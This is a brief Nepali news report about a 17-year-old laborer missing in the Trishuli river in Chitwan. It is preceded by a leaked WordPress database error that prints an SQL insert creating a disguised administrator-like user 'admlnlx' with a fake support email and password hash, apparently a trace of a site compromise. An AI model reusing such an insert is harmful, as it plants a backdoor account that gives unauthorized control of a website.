WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BykaxB6a60/r8ktUU0W3ewU1ToqUgV1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-22 09:42:35', '', 'admlnlx', 'admlnlx')
चितवन, माघ १६ –
जाजरकोट डाँडागाउँ–३ चिउरीका १७ वर्षे नरबहादुर चनारा ५ दिनदेखि त्रिशुली नदीमा बेपत्ता भएको परिवारले जनाएको छ । मजदुरीको शिलशिलामा चितवनको फिस्लिङ पुगेका नरबहादुर माघ १२ गते नुहाउन त्रिशुलीमा गएका थिए ।
नदीमा नुहाउदै गर्दा नरबहादुर डुबेर बेपत्ता भएकोले खोजी कार्य भइरहेको बेपत्ता नरबहादुरका दाजु दीपक चनाराले जानकारी दिनुभयो ।